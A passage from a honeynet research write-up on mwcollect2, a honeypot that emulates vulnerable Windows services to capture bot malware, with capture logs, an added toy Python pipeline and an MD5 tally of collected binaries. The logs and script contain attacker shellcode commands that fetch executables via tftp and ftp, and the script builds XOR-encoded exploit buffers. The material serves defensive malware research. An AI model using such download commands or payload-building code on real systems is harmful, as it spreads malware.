Further Research
An area of research we are leading to improve botnet tracking is malware collection. Under the project name mwcollect2, the German Honeynet Project is
developing a program to "collect" malware in a simple and automated fashion. The mwcollect2 daemon consists of multiple dynamically linked modules:
- Vulnerability modules:
They listen on commonly attacked ports (e.g. TCP 135 for the DCOM RPC vulnerability, or TCP 2745 for the Bagle backdoor) and simulate the corresponding vulnerability just far enough that the attacking exploit delivers its payload.
- Shellcode parsing modules:
These modules turn the shellcode received by one of the vulnerability modules into generic URLs to be fetched by another kind of module.
- Fetch modules:
These simply download the files specified by a URL. The URLs do not necessarily have to be HTTP or FTP URLs, but can also be TFTP or other protocols.
Currently mwcollect2 supports the simulation of several different vulnerabilities. The following two examples show the software in action. In the first example, mwcollect2 simulates the DCOM RPC vulnerability on TCP port 135 and catches a piece of malware in an automated fashion:
mwc-tritium: DCOM Shellcode starts at byte 0x0370 and is 0x01DC bytes long.
mwc-tritium: Detected generic XOR Decoder, key is 12h, code is e8h (e8h) bytes long.
mwc-tritium: Detected generic CreateProcess Shellcode: "tftp.exe -i XXX.XXX.XXX.XXX get cdaccess6.exe"
mwc-tritium: Pushed fetch request for "tftp://XXX.XXX.XXX.XXX/cdaccess6.exe".
mwc-tritium: Finished fetching cdaccess6.exe
In the second example the software simulates a machine that can be exploited through the backdoor left by the Bagle worm on TCP port 2745. Again, mwcollect2 is able to successfully fetch the malware:
mwc-tritium: Bagle connection from XXX.XXX.XXX.XXX:4802 (to :2745).
mwc-tritium: Bagle session with invalid auth string: 43FFFFFF303030010A2891A12BE6602F328F60151A201A00
mwc-tritium: Successful bagle session, fetch "ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe".
mwc-tritium: Pushed fetch request for "ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe".
mwc-tritium: Downloading of ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe (ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe) successful.
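The two log excerpts above show the module chain end to end: a vulnerability module receives the exploit buffer, the shellcode parser recognises the decoder and the CreateProcess command line, and a fetch module retrieves the binary. The following script walks through that chain in miniature. It is an added example, not mwcollect2's code: the decoder-stub signature, the payload framing, the IP addresses (RFC 5737 documentation ranges) and the "served" files are all constructed for the demonstration, and the Bagle backdoor protocol is not modelled (a plain-text URL stands in for a successful Bagle session). It also deduplicates the fetched files by MD5, the way the listing further down counts unique binaries.

```python
"""Toy walk-through of the mwcollect2 pipeline described above
(vulnerability module -> shellcode parser -> fetch module -> MD5 dedup).
Added example, not mwcollect2 code: the decoder stub pattern, payload
framing, addresses and served files are all constructed here."""
import hashlib
import re
from collections import Counter

# ASSUMED decoder signature: the textbook single-byte XOR loop
#   80 30 KEY   xor byte ptr [eax], KEY
#   40          inc eax
#   E2 FA       loop $-6
# followed directly by the encoded body. Real decoders vary and
# mwcollect2's own signatures are not reproduced here.
XOR_STUB = re.compile(rb"\x80\x30(.)\x40\xe2\xfa", re.DOTALL)

# Command lines a CreateProcess shellcode hands to cmd.exe, mapped to the
# generic URL a fetch module understands (tftp://host/file, ftp://..., http://...).
CMD_PATTERNS = [
    (re.compile(rb"tftp(?:\.exe)?\s+-i\s+([^\s\x00]+)\s+get\s+([^\s\x00]+)", re.I),
     lambda m: b"tftp://" + m.group(1) + b"/" + m.group(2)),
    (re.compile(rb"\b((?:https?|ftp|tftp)://[^\s\x00\"]+)", re.I),
     lambda m: m.group(1)),
]


def xor_decode(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def extract_urls(blob: bytes) -> list[str]:
    """Shellcode-parsing step: turn recognised command lines into fetch URLs."""
    urls = []
    for pattern, build in CMD_PATTERNS:
        for m in pattern.finditer(blob):
            urls.append(build(m).decode("ascii", "replace"))
    return urls


def parse_shellcode(payload: bytes):
    """Return (xor_key or None, decoded body, fetch URLs) for one received payload.
    Without a decoder stub the payload is scanned as plain text; this stands in
    for sessions like the Bagle backdoor, whose real protocol is not modelled."""
    m = XOR_STUB.search(payload)
    if m is None:
        return None, payload, extract_urls(payload)
    key = m.group(1)[0]
    body = xor_decode(payload[m.end():], key)
    return key, body, extract_urls(body)


# Constructed stand-in for the network: what the attacker's server would serve.
FAKE_SERVERS = {
    "tftp://198.51.100.7/cdaccess6.exe": b"MZ" + b"\x90" * 64 + b"sample-bot-A",
    "ftp://bla:bla@198.51.100.9:4847/bot.exe": b"MZ" + b"\x90" * 64 + b"sample-bot-B",
}


def fetch(url: str):
    """Fetch-module stand-in: a real one would speak TFTP, FTP or HTTP."""
    return FAKE_SERVERS.get(url)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def collect(payloads):
    """Run every payload through the pipeline. Returns the list of
    (url, md5) fetched and a Counter of md5 -> number of times seen."""
    fetched, hits = [], Counter()
    for payload in payloads:
        _, _, urls = parse_shellcode(payload)
        for url in urls:
            data = fetch(url)
            if data is None:        # unreachable host, dead drop, etc.
                continue
            digest = md5_hex(data)
            hits[digest] += 1
            fetched.append((url, digest))
    return fetched, hits


def listing(hits: Counter) -> list[str]:
    """'<count>x <md5>' per unique binary, like the listing in the paper."""
    return [f"{n}x {digest}" for digest, n in hits.most_common()]


def make_payload(cmdline: bytes, key: int) -> bytes:
    """Constructed exploit buffer: filler, decoder stub, XOR-encoded command line."""
    stub = b"\x80\x30" + bytes([key]) + b"\x40\xe2\xfa"
    return b"A" * 0x20 + stub + xor_decode(cmdline + b"\x00", key)


# Constructed traffic: two identical DCOM-style hits (key 12h as in the log
# above) and one plain-text URL standing in for a Bagle-style session.
SAMPLE_PAYLOADS = [
    make_payload(b"cmd /c tftp.exe -i 198.51.100.7 get cdaccess6.exe", 0x12),
    make_payload(b"cmd /c tftp.exe -i 198.51.100.7 get cdaccess6.exe", 0x12),
    b"ftp://bla:bla@198.51.100.9:4847/bot.exe",
]

if __name__ == "__main__":
    fetched, hits = collect(SAMPLE_PAYLOADS)
    for url, digest in fetched:
        print(f"fetched {url} md5={digest}")
    print("\n".join(listing(hits)))
```

Running it prints three fetches but only two distinct MD5 sums, which is the same "Nx" counting the listing further down uses. In practice the decoder detection is the fragile part: each encoder family needs its own signature, and a payload whose decoder is not recognised yields no URL at all, which is why a collector of this kind must keep adding parser modules as new bot families appear.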
The following listing shows the effectiveness of this approach. Each line gives the number of times a binary was submitted, the submission identifier, the time it was recorded, and the binary's MD5 sum:
7x mwc-datasubm.1108825284.7ad37926 2005-02-19 16:01 CET 71de42be10d1bdff44d872696f900432
1x mwc-datasubm.1108825525.4a12d190 2005-02-19 16:05 CET e8b065b07a53af2c74732a1df1813fd4
1x mwc-datasubm.1108825848.7091609b 2005-02-19 16:10 CET 48b80b4b6ad228a7ec1518566d96e11e
2x mwc-datasubm.1108826117.20bf1135 2005-02-19 16:15 CET c95eb75f93c89695ea160831f70b2a4f
78x mwc-datasubm.1108826639.4a2da0bb 2005-02-19 16:23 CET 42cbaae8306d7bfe9bb809a5123265b9
19x mwc-datasubm.1108826844.36d259cc 2005-02-19 16:27 CET b1db6bbdfda7e4e15a406323bea129ce
3x mwc-datasubm.1108827274.77b0e14b 2005-02-19 16:34 CET fbd133e3d4ed8281e483d8079c583293
3x mwc-datasubm.1108827430.3c0bb9c9 2005-02-19 16:37 CET 7711efd693d4219dd25ec97f0b498c1f
4x mwc-datasubm.1108828105.6db0fb19 2005-02-19 16:48 CET 23fde2e9ebe5cc55ecebdbd4b8415764
29x mwc-datasubm.1108828205.11d60330 2005-02-19 16:50 CET 8982e98f4bde3fb507c17884f60dc086
2x mwc-datasubm.1108828228.500c4315 2005-02-19 16:50 CET d045f06f59ae814514ab329b93987c86
1x mwc-datasubm.1108828305.7c2a39a8 2005-02-19 16:51 CET 556779821a8c053c9cc7d23feb5dd1d4
34x mwc-datasubm.1108828311.655d01da 2005-02-19 16:51 CET de53892362a50b700c4d8eabf7dc5777
1x mwc-datasubm.1108828418.178aede3 2005-02-19 16:53 CET 2a4d822c2a37f1a62e5dd42df19ffc96
1x mwc-datasubm.1108828822.466083aa 2005-02-19 17:00 CET 2c1f92f9faed9a82ad85985c6c809030
1x mwc-datasubm.1108829309.705a683c 2005-02-19 17:08 CET be4236ffe684eb73667c78805be21fe6
11x mwc-datasubm.1108829323.4f579112 2005-02-19 17:08 CET 64cfefc817666dea7bc6f86270812438
1x mwc-datasubm.1108829553.56e1167d 2005-02-19 17:12 CET 5ab66fae6878750b78158acfb225d28f
11x mwc-datasubm.1108830012.4bbdedd9 2005-02-19 17:20 CET 05b691324c6ce7768becbdba9490ee47
1x mwc-datasubm.1108830074.1ca9565f 2005-02-19 17:21 CET e740de886cfa4e1651c3b9be019443f6
98x mwc-datasubm.1108830171.6ea1f079 2005-02-19 17:22 CET 3a0ab2b901f5a9e1023fa839f8ef3fe9
1x mwc-datasubm.1108830729.50dbf813 2005-02-19 17:32 CET f29797873a136a15a7ea19119f72fbed
1x mwc-datasubm.1108831490.3cd98651 2005-02-19 17:44 CET a8571a033629bfad167ef8b4e139ce5c
13x mwc-datasubm.1108832205.5eef6409 2005-02-19 17:56 CET d202563db64f0be026dd6ba900474c64
With the help of just one sensor in a dial-in network we were able to fetch 324 binaries, 24 of them unique, within a period of two hours. Uniqueness was determined with md5sum, a tool to compute and check MD5 message digests. Note that this counts distinct files, not distinct bot families: the same bot repacked or rebuilt with a different configuration yields a different MD5 and therefore a further "unique" sample.
The big advantage of using mwcollect2 to collect bots is clearly stability. A bot trying to exploit a honeypot running Windows 2000 with shellcode whose return address points at a jmp ebx instruction at a Windows XP offset will obviously crash the service; in most cases the honeypot then has to be rebooted. mwcollect2, in contrast, only emulates the vulnerable service, so it can be "successfully" exploited by all of these tools regardless of which platform the shellcode was built for, and hence catches a lot more binaries this way. In addition, mwcollect2 is easier to deploy: just a single make command and the collecting can begin (you might, however, want to change the configuration). The downside of catching bots this way is that the binaries still have to be reviewed manually, whereas a honeypot behind a Honeywall with snort_inline filtering out the relevant IRC traffic could even set up the sniffing drone automatically after exploitation.